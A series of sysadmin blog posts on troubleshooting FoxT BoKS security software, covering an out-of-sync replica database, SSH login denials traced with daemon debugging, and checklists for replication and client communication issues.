Since I've joined $CLIENT in October my life has been nothing but BoKS, BoKS, BoKS. It's great to be working with FoxT's security software again :) A lot of things have changed over the years, though the software is still very, very familiar.

One of the things that's made me happy is that Fox Tech have -finally- made an official logo for their BoKS products! I find it odd that they've been marketing this software for over ten years and that their last logo dates back to the nineties. Said decrepit logo hasn't been used in ages and henceforth BoKS was just known by that: a plain text rendition of the name. By request of $CLIENT, Fox Tech have gotten of their hineys and created a new logo that matches their corporate identity.

As a side note: over the past few weeks I've seen a lot of in-depth troubleshooting and I've decided to share some of the stuff I've learnt. Hence you'll find that the BoKS part of the sysadmin section has been revamped :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

BoKS troubleshooting: another example of a debugging session

2008-11-22 20:29:00

Original issues

As I mentioned at the end of example 1 the problem with the seemingly random login denials was caused by a misbehaving replica server. We tracked the problem down to REPHOST, where we discovered that three of the database tables were not in sync with the rest. A whole number of hosts were being reported as non-existent, which was causing login problems for our users.

Now that we've figured out which server was giving us problems and what the symptoms were, we needed to figure out what was causing the issues.

Symptoms

One of our replica servers had three database tables that were not getting any updates. Their sequence numbers as reported by "boksdiag sequence" were very different from the sequence numbers on the master, indicating nastiness.

Diagnosis

1. Verify the sequence numbers again

Just to be sure that the replica is still malfunctioning, let's check the sequence numbers again.

BoKS > boksdiag sequence

...

T7 13678d 8:33:46 5053 (5053)

...

T9 13178d 11:05:23 7919 (7919)

...

T15 13178d 11:03:16 1865 (1865)

...



BoKS > boksdiag sequence

...

T7 13678d 8:33:46 6982 (6982)

...

T9 13178d 11:05:23 10258 (10258)

...

T15 13178d 11:03:16 2043 (2043)

Yup, it's still broken :) You may notice that the sequence numbers on the replica are actually AHEAD of the numbers on the master server.

2. Demoting the replica to client status

Because I was not sure what had been done to REPHOST in the past I wanted to reset it completely, without reinstalling the software. I knew that the host had been involved in a disaster recovery test a few months before, so I had a hunch that something'd gone awry in the conversion between the various host states.

Hence I chose to convert the replica back to client status.

BoKS> sysreplace restore



BoKS> convert -v client

Stopping daemons...

Setting BOKSINIT=client in ENV file...

Restarting daemons...

Conversion from replica to client done.



BoKS > cd /var/opt/boksm



BoKS > tail -20 boks_errlog

...

WARNING: Dying on signal SIGTERM

boks_authd Nov 17 14:59:30

INFO: Shutdown by signal SIGTERMboks_csspd@REPHOST Nov 17 14:59:30

INFO: Shutdown by signal SIGTERM



boks_authd Nov 17 14:59:30

INFO: Min idle workers 32boks_csspd@REPHOST Nov 17 14:59:30

INFO: Min idle workers 32



BoKS > sysreplace replace

I verified that all the BoKS processes running are newly created and that there are no stragglers from before the restart. Also, I tried to SSH to the replica to make sure that I could still log in.

3. Change the replica's type in the database

The BoKS master server will also need to know that the replica is now a client. In order to do this I needed to change the host's TYPE in the database. Initially I tried doing this with the following command.

BoKS> hostadm -a -h REPHOST -t UNIXBOKSHOST

Unfortunately this command refused to work, so I chose to modify the host type through the BoKS webinterface. Just a matter of a few clicks here and there. Afterwards the BoKS master was aware that the replica was no more. `

BoKS > boksdiag list

Server Since last Since last Since last Count Last

REPHOST5 00:49 523d 5:19:20 04:49 1853521 ok

REPHOST4 00:49 136d 22:21:35 04:49 526392 ok

REPHOST3 00:49 04:50 726768 ok

REPHOST2 00:49 107d 5:05:33 04:49 425231 ok

REPHOST 02:59 02:13 11:44 148342 down

It'll take a little while for REPHOST's entry to completely disappear from the "boksdiag list" output. I sped things up a little bit by restarting the BoKS master using the "Boot -k" and "Boot" commands.

4. Reconvert the host back to a replica

Of course I wanted REPHOST to be a replica again, so I changed the host type in the database using the webinterface.

I then ran the "convert" command on REPHOST to promote the host again.

BoKS > convert -v replica

Checking to see if a master can be found...

Stopping daemons...

Setting BOKSINIT=replica in ENV file...

Restarting daemons...

Conversion from client to replica done.



BoKS > ps -ef | grep -i boks

root 16543 16529 0 15:14:33 ? 0:00 boks_bridge -xn -s -l servc.s -Q !/etc/opt/boksm!.servc!servc_queue -q /etc/opt

root 16536 16529 0 15:14:33 ? 0:00 boks_servc -p1 -xn -Q !/etc/opt/boksm!.xservc1!xservc_queue

root 16535 16529 0 15:14:33 ? 0:00 boks_servm -xn

root 16529 1 0 15:14:33 ? 0:00 boks_init -f /etc/opt/boksm/boksinit.replica

root 16540 16529 0 15:14:33 ? 0:00 boks_bridge -xn -r -l servc.r -Q /etc/opt/boksm/xservc_queue -P servc -k -K /et

root 16552 16529 0 15:14:33 ? 0:00 boks_csspd -e/var/opt/boksm/boks_errlog -x -f -c -r 600 -l -k -t 32 -i 20 -a 15

root 16533 16529 0 15:14:33 ? 0:00 boks_bridge -xn -s -l master.s -Q /etc/opt/boksm/master_queue -P master -k -K /

...

...



BoKS > cd ..



BoKS > tail boks_errlog

boks_authd Nov 17 14:59:30

INFO: Min idle workers 32boks_csspd@REPHOST Nov 17 14:59:30

INFO: Min idle workers 32



boks_init@REPHOST Mon Nov 17 15:02:21 2008

WARNING: Respawn process sshd exited, reason: exit(1). Process restarted.

boks_init@REPHOST Mon Nov 17 15:14:31 2008

WARNING: Dying on signal SIGTERM

boks_aced Nov 17 15:14:33

ERROR: Unable to access configuration file /var/ace/sdconf.rec



On the master server I saw that the replica was communicating with the master again.

BoKS > boksdiag list

Server Since last Since last Since last Count Last

REPHOST5 04:35 523d 5:33:41 06:39 1853555 ok

REPHOST4 04:35 136d 22:35:56 06:42 526426 ok

REPHOST3 04:35 06:43 726802 ok

REPHOST2 04:35 107d 5:19:54 06:41 425265 ok

REPHOST 01:45 16:34 26:05 0 new

Oddly enough REPHOST was not receiving any real database updates. I also noticed that the sequence numbers for the local database copy hadn't changed. This was a hint that stuck in the back of my head, but I didn't pursue it at the time. Instead I expected there to be some problem with the communications bridges between the master and REPHOST.

BoKS > ls -lrt

...

...

-rw-r----- 1 root root 0 Nov 17 15:14 copsable.dat

-rw-r----- 1 root root 0 Nov 17 15:14 cert2user.dat

-rw-r----- 1 root root 0 Nov 17 15:14 cert.dat

-rw-r----- 1 root root 0 Nov 17 15:14 ca.dat

-rw-r----- 1 root root 0 Nov 17 15:14 authenticator.dat

-rw-r----- 1 root root 0 Nov 17 15:14 addr.dat



BoKS >

5. Verify that everything's okay on the replica

I was rather confused by now. Because REPHOST wasn't getting database updates I though to check the following items

Everything seemed completely fine! It was time to break out the big guns.

6. Clear out the database

I decided to clear out the whole local cop of the database, to make sure that REPHOST had a clean start.

BoKS > Boot -k



BoKS > cd /var/opt/boksm



BoKS > tar -cvf data.20081117.tar data/*

a data/ 0K

a data/crypt_spool/ 0K

a data/crypt_spool/clntd/ 0K

a data/crypt_spool/clntd/ba_fbuf_LCK 0K

a data/crypt_spool/clntd/ba_fbuf_0000000004 6K

a data/crypt_spool/clntd/ba_fbuf_0000000003 98K

a data/crypt_spool/servc/ 0K

a data/crypt_spool/servm/ 0K

...



BoKS > cd data



BoKS > rm *.dat



BoKS > Boot

Checking the contents of /var/opt/boksm/data immediately afterwards showed that BoKS had re-created the database table files. Some of them were getting updates, but over 90% of the tables remained completely empty.

7. Debugging the communications bridges

As explained in this article it's possible to trace the internal workings of just about every BoKS process. This includes the various communications bridges that connect the BoKS hosts.

I'd decided to use "bdebug" on the "servm_r" and "servm" processes on REPHOST, while also debugging "drainmast" and "drainmast_s" on the master server. The flow of data starts at drainmast, the goes through drainmast_s and servm_r to finally end up in servm on the replica. Drainmast is what sends data to replicas and servm is what commits the received changes to the local database copy.

Unfortunately the trace output didn't show anything remarkable, so I won't go over the details.

8. Calling in tech support

By now I'd drained all my inspiration. I had no clue what was going on and I was one and a half hours into an incident that should've taken half an hour to fix. Since I always say that one should know one's limitations I decided to call in Fox Tech tech support. Because it was already 1600 and I wanted to have the issue resolved before I went home I called their international support number.

I submitted all the requested files to my engineer at FoxT, who was still investigating the case around 1800. Unfortunately things had gone a bit wrong in the handover between the day and the night shift, so my case had gotten lost. I finally got a call back from an engineer in the US at 2000. I talked things over with him and something in our call triggered that little voice stuck in the back of my head: sequence numbers!

The engineer advised me to go ahead and clear the sequence numbers file on REPHOST. At the same time I also deleted the database files again for a -realy clean start.

BoKS > Boot -k



BoKS > cd /var/opt/boksm



BoKS > tar -cvf data.20081117-2.tar data/*

...



BoKS > cd data



BoKS > rm *.dat



BoKS > rm sequence



BoKS > Boot

Lo and behold! The database copy on REPHOST was being updated! All of the tables were getting filled again, including the three tables that had been stuck from the beginning.

The engineer informed me that in BoKS 6.5 the "convert" command is supposed to clear out the database and sequence file when demoting a master/replica to client status. Apparently this is NOT done automatically in BoKS versions 6.0 and lower.

In conclusion

We discovered that the host had at one point in time played the role of master server and that there was still some leftover crap from that time. During REPHOST's time as the master the sequence numbers for tables 7, 9 and 15 had gotten ahead of the sequence numbers of the real master which was turned off at the time. This had happened because these three tables were edited extensively during the original master's downtime. This in turn led to these tables never getting updated.

After the whole mess was fixed we concluded that the following four steps are all you need to restart your replica in a clean state.

  1. Stop the BoKS software on REPHOST.
  2. Delete all the .dat files in $BOKS_var/data.
  3. Delete the sequence file from $BOKS_var/data.
  4. Restart the BoKS software on REPHOST

I've also asked the folks at Fox Tech to issue a bugfix request to their developers. As I mentioned in step 1, the seqeunce numbers on the replica were ahead of those on the master. Realisticly speaking this should never happen, but BoKS does not currently recognize said situation as a failure.

In the meantime I will write a monitoring script for Nagios and Tivoli that will monitor the proper replication of the BoKS database.


kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS troubleshooting: an example of a debugging session

2008-11-21 21:52:00

Recently we ran into a rather perplexing problem: a few of our customers had intermittent login problems. There seemed to be no pattern to this issue, with users from different departments being deing access to their servers at random points in time. Sometimes the problem would go away after a few hours, sometimes it took a few days. It took a few days before the penny dropped and we found out that one of our replica servers was misbehaving.

The paragraphs below outline my diagnosis and troubleshooting procedure.

Original issues

The issues seemed to focus on servers in one specific, physical location.

One of our DBAs created several incidents over the course of a month regarding login issues with user sybase@SYBHOST. Initially this problem was fixed by adding the "ssh_pk" authenticator, but the problem returned with intermittent login denial without an apparent reason.

A number of users from another department indicated intermittent login problems where they were allowed to login one day and denied access the next. My troubleshooting of the problem hadn't given me any real results so far. I'd ran debugging on SSH sessions which didn't clear much up.

For the remainder of this document I will focus on my troubleshooting process for the case involving user sybase.

Symptoms

These denials occur at seemingly random intervals and result in varying BoKS error messages. Most frequent is the rather useless "ERR 223, no authentication" which, as Fox Tech confirms, tells us absolutely nothing. At other times users receive an "ERR 203, no access route" eventhough said user does in fact have the requisite access routes.

Diagnosis

1. Map out the flow of data in this case.

In this case the DBAs attempt to use SSH (with keypair authentication) from sybase@UNIXHOST, to sybase@SYBHOST.

2. Verify the access routes involved in the exchange.

The BoKS database shows that both hosts are part of the hostgroup SYBASE.

BoKS > hgrpadm -l | grep UNIXHOST

...

SYBASE UNIXHOST

TRUSTED UNIXHOST

...



BoKS > hgrpadm -l | grep SYBHOST

...

SYBASE SYBHOST

TRUSTED SYBHOST

...

The BoKS database shows that user sybase is allowed SSH inside hostgroup SYBASE.

BoKS > sx /opt/boksm/sbin/boksadm -S dumpbase -t 2 | grep SYBASE:sybase

RUSER="SYBASE:sybase" ROUTE="ssh*:TRUSTED->SYBASE"

...

RUSER="SYBASE:sybase" ROUTE="ssh*:ANY/SYBASE->SYBASE"

...

3. Verify the authentication methods involved in the exchange.

The BoKS database confirms that sybase is allowed to use SSH keypairs.

BoKS > sx /opt/boksm/sbin/boksadm -S dumpbase -t 31 | grep SYBASE:sybase

RLOGNAME="SYBASE:sybase" TYPE="ssh_pk" VERSION="1.0" FLAGS="1"

4. Check the SSH keypair.

The public key of sybase@UNIXHOST is correctly installed in the authorized_keys file of user sybase@SYBHOST.

sybase@UNIXHOST > cat ~/.ssh/id_dsa.pub

ssh-dss AAAAB3NzaC1kc3MAAACBANSl ... WjUgDlUEIA5g== sybase@UNIXHOST



sybase@SYBHOST > cat ~/.ssh/authorized_keys

ssh-dss AAAAB3NzaC1kc3MAAACBAPd/ ... 8Cbt3Gl9hvTa== sybase@OTHERHOST

ssh-dss AAAAB3NzaC1kc3MAAACBANSl ... WjUgDlUEIA5g== sybase@UNIXHOST

The permissions on the .ssh directory for sybase@SYBHOST are also correct.

sybase@SYBHOST > ls -al ~/.ssh

drwx------ 2 sybase sybase 96 Aug 15 2007 .

drwxr-xr-x 3 sybase sybase 8192 Sep 12 15:58 ..

-rw------- 1 sybase sybase 1210 Oct 27 10:53 authorized_keys

5. Run SSH debug traces.

Because things seem alright so far it's time to check out what's going wrong on the inside of BoKS. The first step to take is to run an additonal debugging SSH daemon. This can be done using the following command. Key in this are the multiple -d flags and "-p 2222".

BoKS > /opt/boksm/lib/boks_sshd -d -d -d -D -g120 -p 2222 >/tmp/Trace.txt 2>&1

The customer is now instructed to attempt a login to port 2222 by adding "-p 2222" to his usual SSH command. This should of course still fail, but this time we can get a trace.

The trace output file gets pretty long because it no only shows the SSH debug information, but also debugging for the BoKS internals. After going through the hostkey exchange, BoKS will start authentication by requesting valid authentication methods.

debug2: userauth-request for user sybase service ssh-connection method none

debug2: input_userauth_request: setting up authctxt for sybase

...

debug2: get_opt_authmethod_from_servc: INSIDE - user = sybase, need_privsep = 0

debug2: boks_servc_call_vec: INSIDE boks_sshd@SYBHOST[6] 14 Nov 11:21:24:026533 in servc_call_str: To server: {FUNC=route-stat-user FROMUSER = sybase ROUTE = SSH:192.168.0.181->?HOST TOHOST=?HOST TOUSER=sybase FROMHOST = 192.168.0.181}

...

boks_sshd@SYBHOST[6] 14 Nov 11:21:24:264031 in servc_call_str: Return: {FUNC=route-stat-user FROMUSER=sybase ROUTE=SSH:192.168.0.181->?HOST TOHOST=?HOST TOUSER=sybase FROMHOST=192.168.0.181 $HOSTSYM=SYBHOST $ADDR=192.168.40.165 $SERVCADDR=192.168.23.9 METHODS=ssh_pk $SERVCVER=6.0.3}

debug2: get_opt_authmethod_from_servc: Must use BokS authentication methods: "ssh_pk"

debug2: get_opt_authmethod_from_servc: BokS optional authentication methods: ""

debug2: boks_ssh_restrict_authmethods: INSIDE - orginal authmethods = publickey,keyboard-interactive

debug2: boks_ssh_restrict_authmethods: DONE - returning methods = publickey

debug2: userauth-request for user

This confirms that authentication using SSH keypairs is allowed and is actually enforced. The key is now checked and (after some fidgeting) accepted.

debug2: input_userauth_request: try method publickey

debug1: trying public key file /home/sybase/.ssh/authorized_keys

...

debug2: userauth_pubkey: authenticated 1 pkalg ssh-dss

Accepted publickey for sybase from 192.168.0.181 port 63569 ssh2

Now that the user has been authenticated BoKS will check his access routes. Sadly this returns with ERR 203 (no access route)

boks_sshd@SYBHOST[6] 14 Nov 11:21:24:304336 in servc_call_str: To server: {FUNC=auth FROMUSER=sybase ROUTE=SSH:192.168.0.181->?HOST TOHOST=?HOST TOUSER=sybase FROMHOST=192.168.0.181 $ssh_pk=ok}

...

boks_sshd@SYBHOST[6] 14 Nov 11:21:24:314704 in servc_call_str: Return: {FUNC=auth FROMUSER=sybase ROUTE=SSH:UNIXHOST->SYBHOST TOHOST=SYBHOST TOUSER=sybase FROMHOST=192.168.0.181 $ssh_pk=ok01$HOSTSYM=SYBHOST $ADDR=192.168.40.165 $SERVCADDR=192.168.23.9 WC=#$*-./?_ UKEY=SYBASE:sybase MOD_CONV=1 SEC_USER=sybase VTYPE=ssh_pk MODLIST=optional_ssh_pk=+1,psw=+1,prompt=-1,timeout=+1,login=+1,verbose=+1 $STATE=6 ERROR=-203 $SERVCVER=6.0.3}

debug3: boks_ssh_do_authorization: Servc auth failed ERROR = -203

6. Force client to use one replica.

Please note that the SSH debug trace above shows that address 192.168.23.9 is used for the servc calls. This indicates that the client is communicating with replica REPHOST. In order to further aid the troubleshooting process it's best to force the client to communicate with just this one replica.

BoKS > cd /etc/opt/boksm

BoKS > vi bcastaddr



DONT_BROADCAST

ADDRESS_LIST

192.168.23.9 REPHOST.domain

~

~

:wq



BoKS > Boot -k

BoKS > Boot

7. Run a trace on the BoKS communications

Just to play it safe we'll need to check that the client's request is sent and received properly. This can be done by running a BoKS debug on the "servc_bridge_[s|r]" process, "s" being on the sending side and "r" on the receiving end.

Once again we'll be asking the customer to SSH to the system. However, right before he executes his command we'll run the following two commands.

Client: bdebug bridge_servc_s -x 9 -f /tmp/servcs.out

Replica: bdebug bridge_servc_r -x 9 -f /tmp/servcr.out

Right after the customer's SSH session is killed again we'll run the following commands.

Client: bdebug bridge_servc_s -x 0

Replica: bdebug bridge_servc_r -x 0

The two resulting files will be rather large and hard to read. Both log should only be given a cursory glance as they only pertain to the BoKS communications itself. In this case the logs indicate no problems at all, though they might have shown problems with hostkeys or network connectivity.

8. Run a trace on the BoKS database processing

Again we will ask the customer to attempt another (failed) login through SSH. This time we will trace another subset of BoKS, the "servc" process which handles the actual database lookup and verification.

Right before the client executes his SSH we'll run the following command.

Replica: bdebug servc -x 9 -f /tmp/servc-trace.out

Right after the customer's SSH session is killed again we'll run the following commands.

Replica: bdebug servc -x 0

The resulting log file will most likely be huge as it will contain all authentication requests handled by the replica during the trace. In order to get to the part of the log that is of interest to us it's best to do a search for the username (sybase). The first entry that we'll find is part of the setup of the authentication request.

servc@REPHOST[3] 14 Nov 11:43:35:660033 in servc_func_1: From client (SYBHOST) {FUNC=route-stat-user FROMUSER=sybase ROUTE=SSH:192.168.0.181->?HOST TOHOST=?HOST TOUSER=sybase FROMHOST=192.168.0.181}

BoKS will now go through a rather lengthy process of identifying the parties involved, which includes some BoKS-database and DNS voodoo to identify the hosts and their hostgroups. It's important to read all the log entries, searching for errors.

Having ascertained the identity of the parties involved, BoKS will start checking the appropriate access routes for the user. In this case you will see that BoKS will go over the access routes found at step 2 one by one. As part of this list it will also go over the access route that should have given sybase SSH access. However, instead we see the following.

14 Nov 11:43:35:930834 in fetchrec: Reading record from tab 2 at offset 1878504 (688 bytes)

14 Nov 11:43:35:931016 in get_route_key: got "ssh*:ANY/SYBASE->SYBASE"

14 Nov 11:43:35:931150 in am_methodcmp: ssh* == SSH ?

14 Nov 11:43:35:931254 in am_methodcmp: yes

14 Nov 11:43:35:931354 in hosttype_cmp: wild = ANY/SYBASE, host = UNIXHOST

14 Nov 11:43:35:931453 in domexpand: Enter. host="ANY/SYBASE"

...



14 Nov 11:43:35:931863 in domexpand: Return. "ANY/SYBASE.domain"

14 Nov 11:43:35:931963 in domexpand: Enter. host="UNIXHOST"

...

14 Nov 11:43:35:932367 in domexpand: Return. "UNIXHOST.domain"

...

14 Nov 11:43:35:932721 in host_wild_cmp: wild (SYBASE.domain) is a hostgroup

14 Nov 11:43:35:932824 in hostgroup_match_sub: enter

14 Nov 11:43:35:933336 in hostgroup_match_sub: no match

14 Nov 11:43:35:933641 in get_route_key: mismatch

This indicates that BoKS thinks that host UNIXHOST is not part of hostgroup SYBASE, even though we already confirmed that this is in fact the case (see step 2). This would seem to indicate that there are problems with the local copy of the BoKS database on replica REPHOST.

We won't have to continue reading the log file any further.

9. Verify data in database on faulty replica.

Suspecting database problems on the replica we check the following.

BoKS > hgrpadm -l | grep UNIXHOST

...

SYBASE UNIXHOST

TRUSTED UNIXHOST

...

Oddly enough the "hgrpadm" command, which interacts with the database, returns the proper results. However, dumping the local tables shows that we have problems.

BoKS > dumpbase -t 7 | grep UNIXHOST

BoKS > dumpbase -t 9 | grep UNIXHOST

BoKS > dumpbase -t 15 | grep UNIXHOST

10. Verifying the synchronisation status of the database

Run the following command on both the master server and the replica. Compare the figures for each table, looking for any discrepancies. A difference less than ten is alright, but anything in the dozens or higher is a problem. In this case I found the following.

BoKS > boksdiag sequence



Master Replica

...

T7 13678d 8:33:46 5053 (5053)

...

T9 13178d 11:05:23 7919 (7919)

...

T15 13178d 11:03:16 1865 (1865)

...

T7 13678d 8:33:46 6982 (6982)

...

T9 13178d 11:05:23 10258 (10258)

...

T15 13178d 11:03:16 2043 (2043)

This indicates that there are indeed synchronisation problems between this replica server and the master server.

11. Verifying the synch status of other replicas

Now that we've ascertained that there's one replica that's running badly, it's a good idea to check the other replicas as well. Run the "boksdiag sequence" command on the other replicas and verify the figures again.

In this case the figures for the other replicas all look fine, with one exception: REPHOST2 complains about database locking issues. Said error messages also pop up when running "dumpbase" commands on that replica, indicating software errors on that host as well.

boksdiag@REPLICA: INTERNAL DYNDB ERROR in blockbase(): Can't lock database

errno = 28, No space left on device

boksdiag@sREPLICA: INTERNAL DYNDB ERROR in bunlockbase(): Can't unlock database

errno = 28, No space left on device

T0 12549d 6:39:06 94193 (94193)

T1 13907d 7:13:45 637314 (637314)

...

 

In conclusion

In the end the problem was in fact down to REPHOST being out of synch with the rest of the BoKS domain. The troubleshooting continues with example 2.


kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS troubleshooting: SSH daemon and client

2008-11-21 21:13:00

At $CLIENT we found that almost 60% of our time was being spent on troubleshooting SSH or SFTP in one of its many forms. Because each problem -seemed- unique we kept on reinventing the wheel, costing us precious time. To cut down on this I've set up a short procedure that should help in diagnosing the problem. I've also made a list of various symptoms that are linked to rather rare scenarios.

Troubleshooting example 1 also covers most of these steps with some sample output for additional detail.

Standard procedure is to follow these steps:

  1. Check the BoKS transaction log.
  2. Check the user's access rights.
  3. Check for authentication methods.
  4. Check the user's SSH keypair.

This should actually be enough to handle 70% of the cases. For the rest there's more:



1. Check the BoKS transaction log

While this may sound painfully obvious, the best place to see why a user cannot login is the BoKS transaction log. For each login request handled by BoKS these files will contain a log entry. It's easiest to search for the combination of hostname and username and to use the BoKS log parser to make the output legible.

For example:

$ for FILE in `ls -lrt | grep "Dec 13" | awk '{print $9}'`

> do

> grep $HOSTNAME $FILE | grep $USER | /opt/boksm/sbin/bkslog -f -

> done

Using either the output of the parsed BoKS log, or the list of error codes it should be trivial to find out what's going wrong. The most common errors in our environment are the following:



2. Check the user's access rights

As was mentioned, in the cases of a 200, 201 or a 203 you'll have to make sure whether the user actually has access to the requested resource. Crosscheck the following:

One of the most useful commands will be:

BoKS > lsbks -aTl *:$USER

The "lsbks" command lists information about a user. By using -a (all) and -T (access routes) you'll see everything you'll need to know. Hostgroup, userclass, uid/gid, is the account locked, when was the last login, and so on. You'll also see two lists of access routes: one for the individual user and one for his userclass.



3. Check for authentication methods

SSH is tricky insofar that it allows for (a combination of) multiple authentication methods. The most common are password, keyboard interactive and ssh_pk, aka key pair. The keyboard interactive method is actually forced by BoKS, thus disabling the "password" method, which isn't a problem at all since keyboard interactive -includes- password auth.

If the user's denied access it could be that the used authentication method isn't allowed. Per default, users have to use password authentication. In order to allow keypair authentication one has to set a particular flag on the account. This flag can be checked with either of these commands.

BoKS > authadm list -u *:$USER

BoKS > dumpbase -t31 | grep $USER

You'll notice the "must use" flag which indicates whether ssh_pk is optional or required. This value can be change using the -m and -M flags on the "authadm mod" command.



4. Check the user's SSH keypair

If the user is in fact making use of ssh_pk we should ensure that all relevant settings are correct.



5. Rare cases: further debugging

For those few cases that aren't solved by the aforementioned steps, there's a few other things we can try.



6. Scenarios and symptoms


kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS troubleshooting: replication of the BoKS database

2008-11-21 21:08:00

If one or more of the replicas are out of sync login attempts by users may fail, assuming that the BoKS client on the server in question was looking at the out-of-sync BoKS replica. Other nasty stuff may also occur.

Standard procedure is to follow these steps:

  1. Check the status of all BoKS replicas.
  2. Check BoKS error logs on the master and the replica(s).
  3. Try a forced database download.
  4. Check BoKS replication processes to see if they are all running.
  5. Check the master queue, using the boksdiag fque -master command.
  6. Check BoKS communications, using the cadm command.
  7. Check node keys.
  8. Check the replica server's definition on BoKS database.
  9. Check the BoKS configuration on the replica.
  10. Debug replication processes.

All commands are run in a BoKS shell, on the master server unless specified otherwise.



1. Check the status of all BoKS replicas.

# /opt/boksm/sbin/boksadm -S boksdiag list

Since last pckt

The amount of minutes/seconds since the BoKS master last sent a communication packet to the respective replica server. This amount should never exceed more than a couple of minutes.

Since last fail

The amount of days/hours/minutes since the BoKS master was last unable to update the database on the respective replica server. If an amount of a couple of hours is listed you'll know that the replica server had a recent failure.

Since last sync

Shows the amount of days/hours/minutes since BoKS last sent a database update to the respective replica server.

Last status

Yes indeed! The last known status of the replica server in question. OK means that the server is running perfectly and that updates are received. Loading means that the server was just restarted and is still loading the database or any updates. Down indicates that the replica server is down or even dead.



2. Check BoKS error logs on the master and the replica(s).

This should be pretty self-explanatory. Read the /var/opt/boksm/boks_errlog file on both the master and the replicas to see if you can detect any errors there. If the log file doesn't mention something about the hosts involved you should be able to find the cause of the problem pretty quickly.



3. Try a forced database download.

Keon> boksdiag download -force $hostname

This will push a database update to the replica. Perform another boksdiag list to see if it worked. Re-read the BoKS error log file to see if things have cleared up.



4. Check BoKS replication processes to see if they are all running.

Keon> ps -ef | grep -i drainmast

This should show two drainmast processes running. If there aren't you should see errors about this in the error logs and in Tivoli.

Keon> Boot -k

Keon> ps -ef | grep -i boks (kill any remaining BoKS processes)

Keon> Boot

Check to see if the two drainmast processes stay up. Keep checking for at least two minutes. If one of them crashes again, try the following:

Check to see that /opt/boksm/lib/boks_drainmast is still linked to boks_drainmast_d, which should be in the same directory. Also check to see that boks_drainmast_d is still the same file as boks_drainmast_d.nonstripped.

If it isn't, copy boks_drainmast_d to boks_drainmast_d.orig and then copy the non-stripped version over the boks_drainmast_d. This will allow you to create a core file which is useful to TFS Technology.

Keon> Boot -k

Keon> Boot

Keon> ls -al /core

Check that the core file was just created by boks_drainmast_d.

Keon> Boot -k

Keon> cd /var/opt/boksm/data

Keon> tar -cvf masterspool.tar master_spool

Keon> rm master_spool/*

Keon> Boot

Things should now be back to normal. Send both the tar file and the core file to TFS Technology (support@tfstech.com).



5. Check the master queue.

Keon> boksdiag fque -master

If any messages are stuck there is most likely still something wrong with the drainmast processes. You may want to try and reboot the BoKS master software. Do NOT reboot the master server! Reboot the software using the Boot command. If that doesn't help, perform the troubleshooting tips from step 4.



6. Check BoKS communications, using the cadm command.

Verify that the BoKS communication between the master and the replica itself is up and running.

Keon> cadm -l -f bcastaddr -h $replica.

If this doesn't work, re-check the error logs on the client and proceed with step 7.



7. Check node keys.

On the replica system run:

Keon> hostkey

Take the output from that command and run the following on the master:

Keon> dumpbase | grep $hostkey

If this doesn't return the configuration for the replica server, the keys have become unsynchronized. If you make any changes you will need to restart the BoKS processes, using the Boot command.



8. Check the replica server's definition on BoKS database.

Keon> dumpbase | grep RNAME | grep $replica

The TYPE field in the definition of the replica should be set to 261. Anything else is wrong, so you need to update the configuration in the BoKS database. Either that or have SecOPS do it for you.



9. Check the BoKS configuration on the replica.

On the replica system, review the settings in /etc/opt/boksm/ENV.



10. Debug replication processes.

If all of the above fails you should really get cracking with the debugger. Refer to the appropriate chapter of this manual for details.




kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS troubleshooting: login and communications issues on the client

2008-11-21 21:04:00

The basics: verifying the proper functioning of a BoKS client

These easy steps will show you whether your new client is working like it should.

  1. Check the boks_errlog in $BOKS_var.
  2. Run cadm -l -f bcastaddr -h $client from the BoKS master (in a BoKS shell).
  3. Try to login to the new client.

If all three steps go through without error your systems is as healthy as a very healthy good thing... or something.



You can't log in to a BoKS client

Most obviously we can't do our work on that particular server and neither can our customers. Naturally this is something that needs to be fixed quite urgently!

  1. Check BoKS transaction log.
  2. Check if you can log in.
  3. Check BoKS communications
  4. Check bcastaddr and bremotever files.
  5. Check BoKS port number.
  6. Check node keys
  7. Check BoKS error logs.
  8. Debug servc process on replica server or relevant process on client.

All commands are run in a BoKS shell, on the master server unless specified otherwise.



1. Check BoKS transaction log.

Keon> cd /var/opt/boksm/data Keon> grep $user LOG | bkslog -f - -wn

This should give you enough output to ascertain why a certain user cannot login. If there is no output at all, do the following:

Keon> cd /var/junkyard/bokslogs Keon> for file in `ls -lrt | tail -5 | awk '{print $9}'`

> do

> grep $user $file | bkslog -f - -wn

> done

If this doesn't provide any output, perform step 2 as well to see if us sys admins can login.



2. Check if you can log in.

Pretty self-explanatory, isn't it? Try if you can log in yourself.



3. Check BoKS communications

Keon> cadm -l -f bcastaddr -h $client



4. Check bcastaddr and bremotever files.

Login to the client through its console port.

Keon> cat /etc/opt/boksm/bcastaddr

Keon> cat /etc/opt/boksm/bremotever

These two files should match the same files on another working client. Do not use a replica or master to compare the files. These are different over there. If you make any changes you will need to restart the BoKS processes using the Boot command.



5. Check BoKS port number.

On the client and master run:

Keon> getent services boks

This should return the same value for the BoKS base port. If it doesn't either check /etc/services or NIS+. If you make any changes you will need to restart the BoKS processes using the Boot command.



6. Check node keys

On the client system run:

Keon> hostkey

Take the output from that command and run the following on the master:

Keon> dumpbase | grep $hostkey

If this doesn't return the definition for the client server, the keys have become unsynchronized. Reset them and restart the BoKS client software. If you make any changes you will need to restart the BoKS processes using the Boot command.



7. Check BoKS error logs.

This should be pretty self-explanatory. Read the /var/opt/boksm/boks_errlog file on both the master and the client to see if you can detect any errors there. If the log file doesn't mention something about the hosts involved you should be able to find the cause of the problem pretty quickly.



8. Debug servc process on replica server or relevant process on client.

If all of the above fails you should really get cracking with the debugger. Refer to the appropriate chapter of this manual for details (see chapter: SCENARIO: Setting a trace within BoKS)

NOTE: If you need to restart the BoKS software on the client without logging in, try doing so using a remote management tool, like Tivoli.



The client queues are filling up or you can't communicate with the client

The whole of BoKS is still up and running and everything's working perfectly. The only client(s) that won't work are the one(s) that have stuck queues. The only way you'll find out about this is by running boksdiag fque -bridge which reports all of the queues which are stuck.

  1. Check if client is up and running.
  2. Check BoKS communications.
  3. Check node keys.
  4. Check BoKS error logs.

All commands are run in a BoKS shell, on the master server unless specified otherwise.



1. Check if client is up and running.

Keon> ping $client

Also ask your colleagues to see if they're working on the system. Maybe they're performing maintenance.



2. Check BoKS communications.

Keon> cadm -l -f bcastaddr -h $client



3. Check node keys.

On the client system run:

Keon> hostkey

Take the output from that command and run the following on the master:

Keon> dumpbase | grep $hostkey

